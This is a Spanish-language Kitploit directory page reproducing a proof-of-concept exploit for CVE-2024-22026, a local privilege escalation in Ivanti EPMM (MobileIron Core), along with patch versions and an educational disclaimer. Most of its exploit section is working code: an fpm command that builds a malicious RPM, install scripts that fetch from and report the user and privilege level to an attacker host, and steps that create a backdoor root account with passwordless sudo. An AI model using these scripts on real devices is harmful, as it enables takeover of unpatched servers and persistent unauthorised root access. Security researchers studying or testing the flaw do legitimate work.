Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-22026 — PoC de explotación para CVE-2024-22026 que afecta a Ivanti EPMM "MobileIron Core" | Kitploit
Herramientas/GitHubGitHub/securekomodo/cve-2024-22026
Escalada de PrivilegiosGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónPapers e InvestigaciónAprendizaje y Educación
GitHubsecurekomodo/cve-2024-22026

CVE-2024-22026

PoC de explotación para CVE-2024-22026 que afecta a Ivanti EPMM "MobileIron Core"

Ver Repositorio
154hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-22026

POC de exploit para CVE-2024-22026 que afecta a Ivanti EPMM "MobileIron Core" image

CVE-2024-22026 es una vulnerabilidad de escalada de privilegios local en las versiones del servidor Ivanti EPMM (anteriormente MobileIron) anteriores a 12.1.0.0, 12.0.0.0 y 11.12.0.1. Esta vulnerabilidad permite a un atacante local obtener acceso root al sistema explotando el proceso de actualización de software con un paquete RPM malicioso desde una URL remota.

Lea la publicación completa del blog para obtener información técnica detallada: Explotando CVE-2024-22026: Rooteando Ivanti EPMM (MobileIron Core)

Detalles de la vulnerabilidad

  • CVE ID: CVE-2024-22026
  • Severidad: Sin determinar
  • Vector de ataque: Local
  • Impacto: Permite a un atacante local obtener acceso root
  • Versiones afectadas: Versiones del servidor Ivanti EPMM (anteriormente MobileIron) anteriores a 12.1.0.0, 12.0.0.0 y 11.12.0.1
  • Disponibilidad del parche: Parcheado en las versiones 12.1.0.0, 12.0.0.0 y 11.12.0.1

Descubrimiento

Durante nuestra investigación, descubrimos que el dispositivo utiliza el siguiente comando para obtener e instalar paquetes RPM como un usuario con pocos privilegios:

root@kitploit:~
install rpm url <remote url>

El comando anterior es solo un envoltorio CLI para que ocurra lo siguiente, que se ejecuta como root

root@kitploit:~
/bin/rpm -Uvh *.rpm

Este comando rpm subyacente no aplica ninguna verificación de firma ni filtrado de URL, lo que significa que se puede instalar cualquier paquete RPM. Esto permite a un atacante falsificar y entregar un paquete RPM malicioso que puede comprometer el dispositivo.

POC de explotación

Creando el RPM malicioso

El siguiente comando se utiliza para crear un paquete RPM malicioso:

root@kitploit:~
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

Script de preinstalación (preinstall.sh)

root@kitploit:~
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0

Script de postinstalación (postinstall.sh)

root@kitploit:~
#!/bin/sh
set -e  # Enable strict error checking

# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
  echo "Failed to add user 'exploit-poc'" >&2
  exit 1
fi

echo "exploit-poc:<redacted_password>" | chpasswd

# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
  echo "Failed to modify sudoers file" >&2
  exit 1
fi

exit 0

Ejecutando el comando CLI para obtener el RPM

Para explotar la vulnerabilidad, el atacante ejecutaría el siguiente comando en la CLI para obtener e instalar el RPM malicioso:

root@kitploit:~
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm

Mitigación

Ivanti ha publicado parches para solucionar CVE-2024-22026 en las siguientes versiones:

  • 12.1.0.0
  • 12.0.0.0
  • 11.12.0.1

Descargo de responsabilidad

Este repositorio y su contenido están destinados únicamente a fines educativos y de investigación. El uso de la información aquí contenida es bajo su propio riesgo.

Descargar herramienta